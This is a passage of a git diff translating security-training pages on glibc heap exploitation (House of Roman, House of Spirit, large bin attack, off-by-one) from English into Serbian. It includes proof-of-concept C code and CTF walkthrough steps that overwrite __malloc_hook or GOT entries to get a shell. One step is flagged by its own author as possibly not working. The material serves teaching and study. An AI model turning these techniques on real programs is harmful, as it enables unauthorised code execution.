relative_offset_heap - size 0x70 - bin layout: - fastbin: fastbin_victim -> relative_offset_heap - unsorted: leftover_main +bin layout: +fastbin: fastbin_victim -> relative_offset_heap +unsorted: leftover_main */ ``` +- `fastbin_victim` ima `fd` koji pokazuje na `relative_offset_heap` +- `relative_offset_heap` je ofset udaljenosti od `fake_libc_chunk`, koji sadrži pokazivač na `main_arena + 0x68` +- Promenom poslednjeg bajta `fastbin_victim.fd` moguće je da `fastbin_victim` pokazuje na `main_arena + 0x68` -- `fastbin_victim` has a `fd` pointing to `relative_offset_heap` -- 
`relative_offset_heap` is an offset of distance from `fake_libc_chunk`, which contains a pointer to `main_arena + 0x68` -- Just changing the last byte of `fastbin_victim.fd` it's possible to make `fastbin_victim points` to `main_arena + 0x68` +Za prethodne akcije, napadač treba da bude sposoban da modifikuje fd pokazivač `fastbin_victim`. -For the previous actions, the attacker needs to be capable of modifying the fd pointer of `fastbin_victim`. +Zatim, `main_arena + 0x68` nije toliko zanimljiv, pa hajde da ga modifikujemo tako da pokazivač pokazuje na **`__malloc_hook`**. -Then, `main_arena + 0x68` is not that interesting, so lets modify it so the pointer points to **`__malloc_hook`**. +Napomena da `__memalign_hook` obično počinje sa `0x7f` i nulama pre njega, tako da je moguće da se lažno predstavi kao vrednost u `0x70` brzom binu. Pošto su poslednja 4 bita adrese **nasumična**, postoji `2^4=16` mogućnosti za vrednost da završi na mestu koje nas zanima. Tako se ovde izvodi BF napad tako da se chunk završi kao: **`0x70: fastbin_victim -> fake_libc_chunk -> (__malloc_hook - 0x23)`.** -Note that `__memalign_hook` usually starts with `0x7f` and zeros before it, then it's possible to fake it as a value in the `0x70` fast bin. Because the last 4 bits of the address are **random** there are `2^4=16` possibilities for the value to end pointing where are interested. So a BF attack is performed here so the chunk ends like: **`0x70: fastbin_victim -> fake_libc_chunk -> (__malloc_hook - 0x23)`.** - -(For more info about the rest of the bytes check the explanation in the [how2heap](https://github.com/shellphish/how2heap/blob/master/glibc_2.23/house_of_roman.c)[ example](https://github.com/shellphish/how2heap/blob/master/glibc_2.23/house_of_roman.c)). If the BF don't work the program just crashes (so start gain until it works). 
- -Then, 2 mallocs are performed to remove the 2 initial fast bin chunks and the a third one is alloced to get a chunk in the **`__malloc_hook:`** +(Za više informacija o ostalim bajtovima proverite objašnjenje u [how2heap](https://github.com/shellphish/how2heap/blob/master/glibc_2.23/house_of_roman.c)[ primeru](https://github.com/shellphish/how2heap/blob/master/glibc_2.23/house_of_roman.c)). Ako BF ne uspe, program se jednostavno sruši (tako da ponovo pokušajte dok ne uspe). +Zatim, izvršavaju se 2 malloc-a da se uklone 2 inicijalna fast bin chunk-a, a treći se alocira da dobije chunk u **`__malloc_hook:`** ```c malloc(0x60); malloc(0x60); uint8_t* malloc_hook_chunk = malloc(0x60); ``` +### Deo 2: Unsorted_bin napad -### Part 2: Unsorted_bin attack - -For more info you can check: +Za više informacija možete proveriti: {{#ref}} unsorted-bin-attack.md {{#endref}} -But basically it allows to write `main_arena + 0x68` to any location by specified in `chunk->bk`. And for the attack we choose `__malloc_hook`. Then, after overwriting it we will use a relative overwrite) to point to a `one_gadget`. - -For this we start getting a chunk and putting it into the **unsorted bin**: +Ali u suštini omogućava da se napiše `main_arena + 0x68` na bilo koju lokaciju koju odredimo u `chunk->bk`. I za napad biramo `__malloc_hook`. Zatim, nakon prepisivanja, koristićemo relativno prepisivanje da usmerimo na `one_gadget`. +Za ovo počinjemo da dobijamo chunk i stavljamo ga u **unsorted bin**: ```c uint8_t* unsorted_bin_ptr = malloc(0x80); malloc(0x30); // Don't want to consolidate 
@@ -91,25 +86,24 @@ puts("Put chunk into unsorted_bin\n"); // Free the chunk to create the UAF free(unsorted_bin_ptr); ``` - -Use an UAF in this chunk to point `unsorted_bin_ptr->bk` to the address of `__malloc_hook` (we brute forced this previously). +Iskoristite UAF u ovom delu da usmerite `unsorted_bin_ptr->bk` na adresu `__malloc_hook` (to smo prethodno brute-forcovali). > [!CAUTION] -> Note that this attack corrupts the unsorted bin (hence small and large too). So we can only **use allocations from the fast bin now** (a more complex program might do other allocations and crash), and to trigger this we must **alloc the same size or the program will crash.** +> Imajte na umu da ovaj napad korumpira nesortiranu kantu (takođe malu i veliku). Dakle, možemo samo **koristiti alokacije iz brze kante sada** (kompleksniji program može izvršiti druge alokacije i srušiti se), a da bismo to pokrenuli, moramo **alokirati istu veličinu ili će se program srušiti.** -So, to trigger the write of `main_arena + 0x68` in `__malloc_hook` we perform after setting `__malloc_hook` in `unsorted_bin_ptr->bk` we just need to do: **`malloc(0x80)`** +Dakle, da bismo pokrenuli pisanje `main_arena + 0x68` u `__malloc_hook`, nakon postavljanja `__malloc_hook` u `unsorted_bin_ptr->bk` jednostavno treba da uradimo: **`malloc(0x80)`** -### Step 3: Set \_\_malloc_hook to system +### Korak 3: Postavite \_\_malloc_hook na sistem -In the step one we ended controlling a chunk containing `__malloc_hook` (in the variable `malloc_hook_chunk`) and in the second step we managed to write `main_arena + 0x68` in here. +U prvom koraku smo završili kontrolišući deo koji sadrži `__malloc_hook` (u varijabli `malloc_hook_chunk`), a u drugom koraku smo uspeli da napišemo `main_arena + 0x68` ovde. -Now, we abuse a partial overwrite in `malloc_hook_chunk` to use the libc address we wrote there(`main_arena + 0x68`) to **point a `one_gadget` address**. 
+Sada, zloupotrebljavamo delimično prepisivanje u `malloc_hook_chunk` da bismo koristili libc adresu koju smo napisali tamo (`main_arena + 0x68`) da **usmerimo adresu `one_gadget`**. -Here is where it's needed to **bruteforce 12 bits of randomness** (more info in the [how2heap](https://github.com/shellphish/how2heap/blob/master/glibc_2.23/house_of_roman.c)[ example](https://github.com/shellphish/how2heap/blob/master/glibc_2.23/house_of_roman.c)). +Ovde je potrebno **brute-forcovati 12 bita nasumičnosti** (više informacija u [how2heap](https://github.com/shellphish/how2heap/blob/master/glibc_2.23/house_of_roman.c)[ primeru](https://github.com/shellphish/how2heap/blob/master/glibc_2.23/house_of_roman.c)). -Finally, one the correct address is overwritten, **call `malloc` and trigger the `one_gadget`**. +Na kraju, kada je ispravna adresa prepisana, **pozovite `malloc` i pokrenite `one_gadget`**. -## References +## Reference - [https://github.com/shellphish/how2heap](https://github.com/shellphish/how2heap) - [https://github.com/shellphish/how2heap/blob/master/glibc_2.23/house_of_roman.c](https://github.com/shellphish/how2heap/blob/master/glibc_2.23/house_of_roman.c) diff --git a/src/binary-exploitation/libc-heap/house-of-spirit.md b/src/binary-exploitation/libc-heap/house-of-spirit.md index 1ce36fd14..a3a0ad45a 100644 --- a/src/binary-exploitation/libc-heap/house-of-spirit.md +++ b/src/binary-exploitation/libc-heap/house-of-spirit.md @@ -2,14 +2,13 @@ {{#include ../../banners/hacktricks-training.md}} -## Basic Information +## Osnovne informacije -### Code +### Kod
House of Spirit - ```c #include #include @@ -19,99 +18,96 @@ // Code altered to add som prints from: https://heap-exploitation.dhavalkapil.com/attacks/house_of_spirit struct fast_chunk { - size_t prev_size; - size_t size; - struct fast_chunk *fd; - struct fast_chunk *bk; - char buf[0x20]; // chunk falls in fastbin size range +size_t prev_size; +size_t size; +struct fast_chunk *fd; +struct fast_chunk *bk; +char buf[0x20]; // chunk falls in fastbin size range }; int main() { - struct fast_chunk fake_chunks[2]; // Two chunks in consecutive memory - void *ptr, *victim; +struct fast_chunk fake_chunks[2]; // Two chunks in consecutive memory +void *ptr, *victim; - ptr = malloc(0x30); +ptr = malloc(0x30); - printf("Original alloc address: %p\n", ptr); - printf("Main fake chunk:%p\n", &fake_chunks[0]); - printf("Second fake chunk for size: %p\n", &fake_chunks[1]); +printf("Original alloc address: %p\n", ptr); +printf("Main fake chunk:%p\n", &fake_chunks[0]); +printf("Second fake chunk for size: %p\n", &fake_chunks[1]); - // Passes size check of "free(): invalid size" - fake_chunks[0].size = sizeof(struct fast_chunk); +// Passes size check of "free(): invalid size" +fake_chunks[0].size = sizeof(struct fast_chunk); - // Passes "free(): invalid next size (fast)" - fake_chunks[1].size = sizeof(struct fast_chunk); +// Passes "free(): invalid next size (fast)" +fake_chunks[1].size = sizeof(struct fast_chunk); - // Attacker overwrites a pointer that is about to be 'freed' - // Point to .fd as it's the start of the content of the chunk - ptr = (void *)&fake_chunks[0].fd; +// Attacker overwrites a pointer that is about to be 'freed' +// Point to .fd as it's the start of the content of the chunk +ptr = (void *)&fake_chunks[0].fd; - free(ptr); +free(ptr); - victim = malloc(0x30); - printf("Victim: %p\n", victim); +victim = malloc(0x30); +printf("Victim: %p\n", victim); - return 0; +return 0; } ``` -
-### Goal +### Cilj -- Be able to add into the tcache / fast bin an address so later it's possible to allocate it +- Moći dodati adresu u tcache / fast bin kako bi kasnije mogla da se alocira -### Requirements +### Zahtevi -- This attack requires an attacker to be able to create a couple of fake fast chunks indicating correctly the size value of it and then to be able to free the first fake chunk so it gets into the bin. +- Ovaj napad zahteva da napadač može da kreira nekoliko lažnih fast chunk-ova koji ispravno označavaju vrednost veličine, a zatim da može da oslobodi prvi lažni chunk kako bi ušao u bin. -### Attack +### Napad -- Create fake chunks that bypasses security checks: you will need 2 fake chunks basically indicating in the correct positions the correct sizes -- Somehow manage to free the first fake chunk so it gets into the fast or tcache bin and then it's allocate it to overwrite that address - -**The code from** [**guyinatuxedo**](https://guyinatuxedo.github.io/39-house_of_spirit/house_spirit_exp/index.html) **is great to understand the attack.** Although this schema from the code summarises it pretty good: +- Kreirati lažne chunk-ove koji zaobilaze bezbednosne provere: biće vam potrebna 2 lažna chunk-a koja su osnovno postavljena na ispravnim pozicijama sa ispravnim veličinama +- Na neki način osloboditi prvi lažni chunk kako bi ušao u fast ili tcache bin, a zatim ga alocirati da prepiše tu adresu +**Kod od** [**guyinatuxedo**](https://guyinatuxedo.github.io/39-house_of_spirit/house_spirit_exp/index.html) **je odličan za razumevanje napada.** Iako ova šema iz koda to prilično dobro sumira: ```c /* - this will be the structure of our two fake chunks: - assuming that you compiled it for x64 +this will be the structure of our two fake chunks: +assuming that you compiled it for x64 - +-------+---------------------+------+ - | 0x00: | Chunk # 0 prev size | 0x00 | - +-------+---------------------+------+ - | 0x08: | Chunk # 0 size | 0x60 | - 
+-------+---------------------+------+ - | 0x10: | Chunk # 0 content | 0x00 | - +-------+---------------------+------+ - | 0x60: | Chunk # 1 prev size | 0x00 | - +-------+---------------------+------+ - | 0x68: | Chunk # 1 size | 0x40 | - +-------+---------------------+------+ - | 0x70: | Chunk # 1 content | 0x00 | - +-------+---------------------+------+ ++-------+---------------------+------+ +| 0x00: | Chunk # 0 prev size | 0x00 | ++-------+---------------------+------+ +| 0x08: | Chunk # 0 size | 0x60 | ++-------+---------------------+------+ +| 0x10: | Chunk # 0 content | 0x00 | ++-------+---------------------+------+ +| 0x60: | Chunk # 1 prev size | 0x00 | ++-------+---------------------+------+ +| 0x68: | Chunk # 1 size | 0x40 | ++-------+---------------------+------+ +| 0x70: | Chunk # 1 content | 0x00 | ++-------+---------------------+------+ - for what we are doing the prev size values don't matter too much - the important thing is the size values of the heap headers for our fake chunks +for what we are doing the prev size values don't matter too much +the important thing is the size values of the heap headers for our fake chunks */ ``` - > [!NOTE] -> Note that it's necessary to create the second chunk in order to bypass some sanity checks. +> Imajte na umu da je potrebno kreirati drugi deo kako bi se zaobišle neke provere. 
-## Examples +## Primeri - **CTF** [**https://guyinatuxedo.github.io/39-house_of_spirit/hacklu14_oreo/index.html**](https://guyinatuxedo.github.io/39-house_of_spirit/hacklu14_oreo/index.html) - - **Libc infoleak**: Via an overflow it's possible to change a pointer to point to a GOT address in order to leak a libc address via the read action of the CTF - - **House of Spirit**: Abusing a counter that counts the number of "rifles" it's possible to generate a fake size of the first fake chunk, then abusing a "message" it's possible to fake the second size of a chunk and finally abusing an overflow it's possible to change a pointer that is going to be freed so our first fake chunk is freed. Then, we can allocate it and inside of it there is going to be the address to where "message" is stored. Then, it's possible to make this point to the `scanf` entry inside the GOT table, so we can overwrite it with the address to system.\ - Next time `scanf` is called, we can send the input `"/bin/sh"` and get a shell. +- **Libc infoleak**: Putem prelivanja moguće je promeniti pokazivač da pokazuje na GOT adresu kako bi se otkrila libc adresa putem akcije čitanja CTF-a. +- **House of Spirit**: Zloupotrebom brojača koji broji broj "pušaka" moguće je generisati lažnu veličinu prvog lažnog dela, zatim zloupotrebom "poruke" moguće je lažirati drugu veličinu dela i konačno zloupotrebom prelivanja moguće je promeniti pokazivač koji će biti oslobođen tako da se naš prvi lažni deo oslobodi. Tada možemo alocirati i unutar njega će biti adresa na kojoj je "poruka" smeštena. Tada je moguće usmeriti ovo na `scanf` ulaz unutar GOT tabele, tako da možemo prepisati sa adresom do sistema.\ +Sledeći put kada se pozove `scanf`, možemo poslati ulaz `"/bin/sh"` i dobiti shell. - [**Gloater. HTB Cyber Apocalypse CTF 2024**](https://7rocky.github.io/en/ctf/other/htb-cyber-apocalypse/gloater/) - - **Glibc leak**: Uninitialized stack buffer. 
- - **House of Spirit**: We can modify the first index of a global array of heap pointers. With a single byte modification, we use `free` on a fake chunk inside a valid chunk, so that we get an overlapping chunks situation after allocating again. With that, a simple Tcache poisoning attack works to get an arbitrary write primitive. +- **Glibc leak**: Neinicijalizovani bafer na steku. +- **House of Spirit**: Možemo modifikovati prvi indeks globalnog niza pokazivača na heap. Sa jednom modifikacijom bajta, koristimo `free` na lažnom delu unutar validnog dela, tako da dobijemo situaciju preklapanja delova nakon ponovne alokacije. Sa tim, jednostavan Tcache trovanje napad funkcioniše da dobijemo proizvoljnu pisanu primitivnu. -## References +## Reference - [https://heap-exploitation.dhavalkapil.com/attacks/house_of_spirit](https://heap-exploitation.dhavalkapil.com/attacks/house_of_spirit) diff --git a/src/binary-exploitation/libc-heap/large-bin-attack.md b/src/binary-exploitation/libc-heap/large-bin-attack.md index fb8a721c9..cb97f715f 100644 --- a/src/binary-exploitation/libc-heap/large-bin-attack.md +++ b/src/binary-exploitation/libc-heap/large-bin-attack.md 
@@ -4,55 +4,53 @@ ## Basic Information -For more information about what is a large bin check this page: +Za više informacija o tome šta je veliki bin, proverite ovu stranicu: {{#ref}} bins-and-memory-allocations.md {{#endref}} -It's possible to find a great example in [**how2heap - large bin attack**](https://github.com/shellphish/how2heap/blob/master/glibc_2.35/large_bin_attack.c). +Moguće je pronaći odličan primer u [**how2heap - large bin attack**](https://github.com/shellphish/how2heap/blob/master/glibc_2.35/large_bin_attack.c). -Basically here you can see how, in the latest "current" version of glibc (2.35), it's not checked: **`P->bk_nextsize`** allowing to modify an arbitrary address with the value of a large bin chunk if certain conditions are met. +U suštini, ovde možete videti kako, u najnovijoj "trenutnoj" verziji glibc (2.35), nije provereno: **`P->bk_nextsize`** što omogućava modifikaciju proizvoljne adrese sa vrednošću velikog bin chunk-a ako su ispunjeni određeni uslovi. -In that example you can find the following conditions: +U tom primeru možete pronaći sledeće uslove: -- A large chunk is allocated -- A large chunk smaller than the first one but in the same index is allocated - - Must be smalled so in the bin it must go first -- (A chunk to prevent merging with the top chunk is created) -- Then, the first large chunk is freed and a new chunk bigger than it is allocated -> Chunk1 goes to the large bin -- Then, the second large chunk is freed -- Now, the vulnerability: The attacker can modify `chunk1->bk_nextsize` to `[target-0x20]` -- Then, a larger chunk than chunk 2 is allocated, so chunk2 is inserted in the large bin overwriting the address `chunk1->bk_nextsize->fd_nextsize` with the address of chunk2 +- Veliki chunk je alociran +- Veliki chunk manji od prvog, ali u istom indeksu, je alociran +- Mora biti manji tako da mora ići prvi u bin +- (Chunk za sprečavanje spajanja sa top chunk-om je kreiran) +- Zatim, prvi veliki chunk je oslobođen i novi 
chunk veći od njega je alociran -> Chunk1 ide u veliki bin +- Zatim, drugi veliki chunk je oslobođen +- Sada, ranjivost: Napadač može modifikovati `chunk1->bk_nextsize` na `[target-0x20]` +- Zatim, alocira se veći chunk od chunk 2, tako da se chunk2 ubacuje u veliki bin prepisujući adresu `chunk1->bk_nextsize->fd_nextsize` sa adresom chunk2 > [!TIP] -> There are other potential scenarios, the thing is to add to the large bin a chunk that is **smaller** than a current X chunk in the bin, so it need to be inserted just before it in the bin, and we need to be able to modify X's **`bk_nextsize`** as thats where the address of the smaller chunk will be written to. - -This is the relevant code from malloc. Comments have been added to understand better how the address was overwritten: +> Postoje i drugi potencijalni scenariji, stvar je dodati u veliki bin chunk koji je **manji** od trenutnog X chunk-a u bin-u, tako da treba biti umetnut neposredno pre njega u bin, i moramo biti u mogućnosti da modifikujemo X-ov **`bk_nextsize`** jer će se tu zapisati adresa manjeg chunk-a. +Ovo je relevantan kod iz malloc. 
Komentari su dodati da bi se bolje razumelo kako je adresa prepisana: ```c /* if smaller than smallest, bypass loop below */ assert (chunk_main_arena (bck->bk)); if ((unsigned long) (size) < (unsigned long) chunksize_nomask (bck->bk)) - { - fwd = bck; // fwd = p1 - bck = bck->bk; // bck = p1->bk +{ +fwd = bck; // fwd = p1 +bck = bck->bk; // bck = p1->bk - victim->fd_nextsize = fwd->fd; // p2->fd_nextsize = p1->fd (Note that p1->fd is p1 as it's the only chunk) - victim->bk_nextsize = fwd->fd->bk_nextsize; // p2->bk_nextsize = p1->fd->bk_nextsize - fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim; // p1->fd->bk_nextsize->fd_nextsize = p2 - } +victim->fd_nextsize = fwd->fd; // p2->fd_nextsize = p1->fd (Note that p1->fd is p1 as it's the only chunk) +victim->bk_nextsize = fwd->fd->bk_nextsize; // p2->bk_nextsize = p1->fd->bk_nextsize +fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim; // p1->fd->bk_nextsize->fd_nextsize = p2 +} ``` +Ovo se može koristiti za **prepisivanje `global_max_fast` globalne promenljive** libc kako bi se iskoristio fast bin napad sa većim delovima. -This could be used to **overwrite the `global_max_fast` global variable** of libc to then exploit a fast bin attack with larger chunks. +Možete pronaći još jedno odlično objašnjenje ovog napada u [**guyinatuxedo**](https://guyinatuxedo.github.io/32-largebin_attack/largebin_explanation0/index.html). -You can find another great explanation of this attack in [**guyinatuxedo**](https://guyinatuxedo.github.io/32-largebin_attack/largebin_explanation0/index.html). - -### Other examples +### Ostali primeri - [**La casa de papel. HackOn CTF 2024**](https://7rocky.github.io/en/ctf/other/hackon-ctf/la-casa-de-papel/) - - Large bin attack in the same situation as it appears in [**how2heap**](https://github.com/shellphish/how2heap/blob/master/glibc_2.35/large_bin_attack.c). - - The write primitive is more complex, because `global_max_fast` is useless here. 
- - FSOP is needed to finish the exploit. +- Large bin napad u istoj situaciji kao što se pojavljuje u [**how2heap**](https://github.com/shellphish/how2heap/blob/master/glibc_2.35/large_bin_attack.c). +- Write primitiv je složeniji, jer je `global_max_fast` ovde beskoristan. +- FSOP je potreban da se završi eksploatacija. {{#include ../../banners/hacktricks-training.md}} diff --git a/src/binary-exploitation/libc-heap/off-by-one-overflow.md b/src/binary-exploitation/libc-heap/off-by-one-overflow.md index 000044db5..3d889775c 100644 --- a/src/binary-exploitation/libc-heap/off-by-one-overflow.md +++ b/src/binary-exploitation/libc-heap/off-by-one-overflow.md 
@@ -4,112 +4,110 @@ ## Basic Information -Having just access to a 1B overflow allows an attacker to modify the `size` field from the next chunk. This allows to tamper which chunks are actually freed, potentially generating a chunk that contains another legit chunk. The exploitation is similar to [double free](double-free.md) or overlapping chunks. +Imati pristup 1B overflow-u omogućava napadaču da izmeni `size` polje sledećeg dela. Ovo omogućava manipulaciju kojim delovima su zapravo oslobođeni, potencijalno generišući deo koji sadrži još jedan legitiman deo. Eksploatacija je slična [double free](double-free.md) ili preklapanju delova. -There are 2 types of off by one vulnerabilities: +Postoje 2 tipa off by one ranjivosti: -- Arbitrary byte: This kind allows to overwrite that byte with any value -- Null byte (off-by-null): This kind allows to overwrite that byte only with 0x00 - - A common example of this vulnerability can be seen in the following code where the behavior of `strlen` and `strcpy` is inconsistent, which allows set a 0x00 byte in the beginning of the next chunk. - - This can be expoited with the [House of Einherjar](house-of-einherjar.md). - - If using Tcache, this can be leveraged to a [double free](double-free.md) situation. +- Arbitrary byte: Ova vrsta omogućava prepisivanje tog bajta bilo kojom vrednošću +- Null byte (off-by-null): Ova vrsta omogućava prepisivanje tog bajta samo sa 0x00 +- Uobičajen primer ove ranjivosti može se videti u sledećem kodu gde je ponašanje `strlen` i `strcpy` nekonzistentno, što omogućava postavljanje 0x00 bajta na početak sledećeg dela. +- Ovo se može iskoristiti sa [House of Einherjar](house-of-einherjar.md). +- Ako se koristi Tcache, ovo se može iskoristiti za situaciju [double free](double-free.md).
Off-by-null - ```c // From https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/off_by_one/ int main(void) { - char buffer[40]=""; - void *chunk1; - chunk1 = malloc(24); - puts("Get Input"); - gets(buffer); - if(strlen(buffer)==24) - { - strcpy(chunk1,buffer); - } - return 0; +char buffer[40]=""; +void *chunk1; +chunk1 = malloc(24); +puts("Get Input"); +gets(buffer); +if(strlen(buffer)==24) +{ +strcpy(chunk1,buffer); +} +return 0; } ``` -
-Among other checks, now whenever a chunk is free the previous size is compared with the size configured in the metadata's chunk, making this attack fairly complex from version 2.28. +Među ostalim proverama, sada kada je deo slobodan, prethodna veličina se upoređuje sa veličinom konfigurisanim u metapodacima, što ovu napad čini prilično složenim od verzije 2.28. -### Code example: +### Primer koda: - [https://github.com/DhavalKapil/heap-exploitation/blob/d778318b6a14edad18b20421f5a06fa1a6e6920e/assets/files/shrinking_free_chunks.c](https://github.com/DhavalKapil/heap-exploitation/blob/d778318b6a14edad18b20421f5a06fa1a6e6920e/assets/files/shrinking_free_chunks.c) -- This attack is no longer working due to the use of Tcaches. - - Moreover, if you try to abuse it using larger chunks (so tcaches aren't involved), you will get the error: `malloc(): invalid next size (unsorted)` +- Ovaj napad više ne funkcioniše zbog korišćenja Tcaches. +- Štaviše, ako pokušate da ga zloupotrebite koristeći veće delove (tako da tcaches nisu uključeni), dobićete grešku: `malloc(): invalid next size (unsorted)` -### Goal +### Cilj -- Make a chunk be contained inside another chunk so writing access over that second chunk allows to overwrite the contained one +- Napraviti deo koji je sadržan unutar drugog dela tako da pisanje pristupa preko tog drugog dela omogućava prepisivanje sadržanog dela -### Requirements +### Zahtevi -- Off by one overflow to modify the size metadata information +- Off by one overflow za modifikaciju informacija o veličini metapodataka -### General off-by-one attack +### Opšti off-by-one napad -- Allocate three chunks `A`, `B` and `C` (say sizes 0x20), and another one to prevent consolidation with the top-chunk. -- Free `C` (inserted into 0x20 Tcache free-list). -- Use chunk `A` to overflow on `B`. Abuse off-by-one to modify the `size` field of `B` from 0x21 to 0x41. 
-- Now we have `B` containing the free chunk `C` -- Free `B` and allocate a 0x40 chunk (it will be placed here again) -- We can modify the `fd` pointer from `C`, which is still free (Tcache poisoning) +- Alocirati tri dela `A`, `B` i `C` (recimo veličine 0x20), i još jedan da se spreči konsolidacija sa top-chunk. +- Osloboditi `C` (ubacen u 0x20 Tcache slobodnu listu). +- Koristiti deo `A` da preplavi `B`. Zloupotrebiti off-by-one da modifikujete polje `size` `B` sa 0x21 na 0x41. +- Sada imamo `B` koji sadrži slobodan deo `C` +- Osloboditi `B` i alocirati 0x40 deo (ponovo će biti postavljen ovde) +- Možemo modifikovati `fd` pokazivač iz `C`, koji je još uvek slobodan (Tcache trovanje) -### Off-by-null attack +### Off-by-null napad -- 3 chunks of memory (a, b, c) are reserved one after the other. Then the middle one is freed. The first one contains an off by one overflow vulnerability and the attacker abuses it with a 0x00 (if the previous byte was 0x10 it would make he middle chunk indicate that it’s 0x10 smaller than it really is). -- Then, 2 more smaller chunks are allocated in the middle freed chunk (b), however, as `b + b->size` never updates the c chunk because the pointed address is smaller than it should. -- Then, b1 and c gets freed. As `c - c->prev_size` still points to b (b1 now), both are consolidated in one chunk. However, b2 is still inside in between b1 and c. -- Finally, a new malloc is performed reclaiming this memory area which is actually going to contain b2, allowing the owner of the new malloc to control the content of b2. +- 3 dela memorije (a, b, c) su rezervisana jedan za drugim. Zatim je srednji deo oslobođen. Prvi deo sadrži off by one overflow ranjivost i napadač je zloupotrebljava sa 0x00 (ako je prethodni bajt bio 0x10, to bi učinilo da srednji deo pokazuje da je 0x10 manji nego što zapravo jeste). 
+- Zatim, 2 manja dela su alocirana u oslobođenom delu (b), međutim, pošto `b + b->size` nikada ne ažurira deo c jer je pokazana adresa manja nego što bi trebala. +- Zatim, b1 i c se oslobađaju. Pošto `c - c->prev_size` još uvek pokazuje na b (sada b1), oba se konsoliduju u jedan deo. Međutim, b2 je još uvek unutra između b1 i c. +- Na kraju, izvršava se nova malloc koja preuzima ovo područje memorije koje će zapravo sadržati b2, omogućavajući vlasniku nove malloc da kontroliše sadržaj b2. -This image explains perfectly the attack: +Ova slika savršeno objašnjava napad:

https://heap-exploitation.dhavalkapil.com/attacks/shrinking_free_chunks

-## Other Examples & References +## Ostali primeri i reference - [**https://heap-exploitation.dhavalkapil.com/attacks/shrinking_free_chunks**](https://heap-exploitation.dhavalkapil.com/attacks/shrinking_free_chunks) - [**Bon-nie-appetit. HTB Cyber Apocalypse CTF 2022**](https://7rocky.github.io/en/ctf/htb-challenges/pwn/bon-nie-appetit/) - - Off-by-one because of `strlen` considering the next chunk's `size` field. - - Tcache is being used, so a general off-by-one attacks works to get an arbitrary write primitive with Tcache poisoning. +- Off-by-one zbog `strlen` koji uzima u obzir polje `size` sledećeg dela. +- Tcache se koristi, tako da opšti off-by-one napadi funkcionišu da dobiju proizvoljnu write primitivu sa Tcache trovanjem. - [**Asis CTF 2016 b00ks**](https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/off_by_one/#1-asis-ctf-2016-b00ks) - - It's possible to abuse an off by one to leak an address from the heap because the byte 0x00 of the end of a string being overwritten by the next field. - - Arbitrary write is obtained by abusing the off by one write to make the pointer point to another place were a fake struct with fake pointers will be built. Then, it's possible to follow the pointer of this struct to obtain arbitrary write. - - The libc address is leaked because if the heap is extended using mmap, the memory allocated by mmap has a fixed offset from libc. - - Finally the arbitrary write is abused to write into the address of \_\_free_hook with a one gadget. +- Moguće je zloupotrebiti off by one da se otkrije adresa iz heap-a jer bajt 0x00 na kraju stringa bude prepisan sledećim poljem. +- Proizvoljno pisanje se dobija zloupotrebom off by one pisanja da se pokazivač usmeri na drugo mesto gde će biti izgrađena lažna struktura sa lažnim pokazivačima. Zatim, moguće je pratiti pokazivač ove strukture da bi se dobilo proizvoljno pisanje. +- libc adresa se otkriva jer ako se heap proširi koristeći mmap, memorija alocirana od mmap ima fiksni offset od libc. 
+- Na kraju, proizvoljno pisanje se zloupotrebljava da se piše u adresu \_\_free_hook sa jednim gadgetom. - [**plaidctf 2015 plaiddb**](https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/off_by_one/#instance-2-plaidctf-2015-plaiddb) - - There is a NULL off by one vulnerability in the `getline` function that reads user input lines. This function is used to read the "key" of the content and not the content. - - In the writeup 5 initial chunks are created: - - chunk1 (0x200) - - chunk2 (0x50) - - chunk5 (0x68) - - chunk3 (0x1f8) - - chunk4 (0xf0) - - chunk defense (0x400) to avoid consolidating with top chunk - - Then chunk 1, 5 and 3 are freed, so: - - ```python - [ 0x200 Chunk 1 (free) ] [ 0x50 Chunk 2 ] [ 0x68 Chunk 5 (free) ] [ 0x1f8 Chunk 3 (free) ] [ 0xf0 Chunk 4 ] [ 0x400 Chunk defense ] - ``` - - Then abusing chunk3 (0x1f8) the null off-by-one is abused writing the prev_size to `0x4e0`. - - Note how the sizes of the initially allocated chunks1, 2, 5 and 3 plus the headers of 4 of those chunks equals to `0x4e0`: `hex(0x1f8 + 0x10 + 0x68 + 0x10 + 0x50 + 0x10 + 0x200) = 0x4e0` - - Then, chunk 4 is freed, generating a chunk that consumes all the chunks till the beginning: - - ```python - [ 0x4e0 Chunk 1-2-5-3 (free) ] [ 0xf0 Chunk 4 (corrupted) ] [ 0x400 Chunk defense ] - ``` - - ```python - [ 0x200 Chunk 1 (free) ] [ 0x50 Chunk 2 ] [ 0x68 Chunk 5 (free) ] [ 0x1f8 Chunk 3 (free) ] [ 0xf0 Chunk 4 ] [ 0x400 Chunk defense ] - ``` - - Then, `0x200` bytes are allocated filling the original chunk 1 - - And another 0x200 bytes are allocated and chunk2 is destroyed and therefore there isn't no fucking leak and this doesn't work? 
Maybe this shouldn't be done - - Then, it allocates another chunk with 0x58 "a"s (overwriting chunk2 and reaching chunk5) and modifies the `fd` of the fast bin chunk of chunk5 pointing it to `__malloc_hook` - - Then, a chunk of 0x68 is allocated so the fake fast bin chunk in `__malloc_hook` is the following fast bin chunk - - Finally, a new fast bin chunk of 0x68 is allocated and `__malloc_hook` is overwritten with a `one_gadget` address +- Postoji NULL off by one ranjivost u funkciji `getline` koja čita linije korisničkog unosa. Ova funkcija se koristi za čitanje "ključa" sadržaja, a ne samog sadržaja. +- U pisanju se kreira 5 inicijalnih delova: +- chunk1 (0x200) +- chunk2 (0x50) +- chunk5 (0x68) +- chunk3 (0x1f8) +- chunk4 (0xf0) +- chunk odbrane (0x400) da se izbegne konsolidacija sa top chunk +- Zatim se oslobađaju chunk 1, 5 i 3, tako da: +- ```python +[ 0x200 Chunk 1 (free) ] [ 0x50 Chunk 2 ] [ 0x68 Chunk 5 (free) ] [ 0x1f8 Chunk 3 (free) ] [ 0xf0 Chunk 4 ] [ 0x400 Chunk defense ] +``` +- Zatim zloupotrebljavajući chunk3 (0x1f8) null off-by-one se zloupotrebljava pišući prev_size na `0x4e0`. +- Obratite pažnju na to kako veličine inicijalno alociranih chunk1, 2, 5 i 3 plus zaglavlja 4 od tih chunkova jednako je `0x4e0`: `hex(0x1f8 + 0x10 + 0x68 + 0x10 + 0x50 + 0x10 + 0x200) = 0x4e0` +- Zatim, chunk 4 se oslobađa, generišući chunk koji konzumira sve delove do početka: +- ```python +[ 0x4e0 